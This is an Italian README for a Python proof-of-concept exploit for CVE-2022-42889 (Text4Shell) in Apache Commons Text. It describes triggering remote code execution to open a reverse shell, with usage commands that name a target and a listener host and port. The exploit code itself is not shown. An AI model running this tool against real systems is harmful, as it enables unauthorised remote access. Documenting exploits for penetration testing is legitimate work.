
Proof of Concept (PoC) per CVE-2022-42889 (Text4Shell) che mira alle versioni di Apache Commons Text precedenti alla 1.10.0. Questo script automatizza l'esecuzione remota di codice (RCE) tramite interpolazione di script per stabilire una reverse shell. Questa versione è un'ottimizzazione strutturata basata sull'exploit originale trovato su Exploit-DB (ID: 52261).
Questo script è uno strumento di penetration testing progettato per sfruttare la vulnerabilità CVE-2022-42889, nota anche come Text4Shell, in Apache Commons Text (versioni < 1.10.0). Automatizza l'invio di un payload basato su Java per attivare una reverse shell.
Questa implementazione si basa sull'exploit pubblico: https://www.exploit-db.com/exploits/52261
Lo script richiede Python 3 e la libreria requests.
pip install requests
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139
Questo strumento è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script.